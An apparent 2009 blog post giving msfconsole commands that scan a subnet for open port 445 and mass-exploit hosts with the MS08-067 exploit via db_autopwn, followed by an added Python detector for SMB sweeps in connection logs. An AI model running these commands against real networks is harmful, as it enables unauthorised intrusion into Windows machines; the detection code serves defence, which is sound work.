Sunday, February 15, 2009

Metasploit for Dummies

The Metasploit team is giving out a very simple step-by-step example of exploiting the latest MS08-067 vulnerability from msfconsole.

The steps below scan the hosts on subnet AAA.BBB.CCC.0/24 for open port 445 and launch the exploit against the active hosts.

msf > load db_sqlite3
msf > db_create
msf > db_nmap -sS -PS445 -p445 -n -T Aggressive AAA.BBB.CCC.0/24
msf > db_autopwn -e -p -b -m ms08_067

Then list the open sessions and interact with one:
msf > sessions -l
msf > sessions -i 1
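
On the network, the db_nmap step above appears as one source sending SYNs to TCP 445 on many hosts of the subnet within seconds. The following is an added example, not part of the original post or of Metasploit: it flags such sweeps in connection logs, and the log format, window, threshold and addresses are assumptions constructed for illustration.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)  # assumed sliding window
THRESHOLD = 20                  # assumed limit of distinct hosts per window

def parse(line):
    """Parse 'timestamp src dst dport flags' (constructed log format)."""
    ts, src, dst, dport, flags = line.split()
    return datetime.fromisoformat(ts), src, dst, int(dport), flags

def find_smb_sweeps(lines, window=WINDOW, threshold=THRESHOLD):
    """Map each sweeping source to the peak number of distinct hosts it
    sent a bare SYN to on TCP 445 inside one window."""
    recent = defaultdict(deque)  # src -> (ts, dst) pairs still in the window
    flagged = {}
    for ts, src, dst, dport, flags in sorted(map(parse, lines)):
        if dport != 445 or flags != "S":
            continue
        q = recent[src]
        q.append((ts, dst))
        while ts - q[0][0] > window:  # drop probes older than the window
            q.popleft()
        distinct = len({d for _, d in q})
        if distinct >= threshold:
            flagged[src] = max(flagged.get(src, 0), distinct)
    return flagged

def sample_log():
    """Constructed sample: one /24 sweep, one normal SMB client, web noise."""
    t0 = datetime(2009, 2, 15, 10, 0, 0)
    def row(delta, src, dst, port):
        return f"{(t0 + delta).isoformat()} {src} {dst} {port} S"
    lines = [row(timedelta(milliseconds=100 * i), "10.0.9.50", f"10.0.0.{i}", 445)
             for i in range(1, 255)]   # 254 hosts probed in about 25 seconds
    lines += [row(timedelta(minutes=i), "10.0.0.77", f"10.0.0.{5 + i % 2}", 445)
              for i in range(30)]      # client using two file servers
    lines += [row(timedelta(seconds=i), "10.0.0.88", f"10.0.1.{i}", 80)
              for i in range(1, 100)]  # many hosts, but not port 445
    return lines

if __name__ == "__main__":
    for src, hosts in find_smb_sweeps(sample_log()).items():
        print(f"possible SMB sweep: {src} probed {hosts} hosts on 445/tcp")
```

The normal client is not flagged because it only ever reaches two servers, which is the property that separates file-share use from a sweep.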

For writing shellcode, see Generating Shellcode Using Metasploit.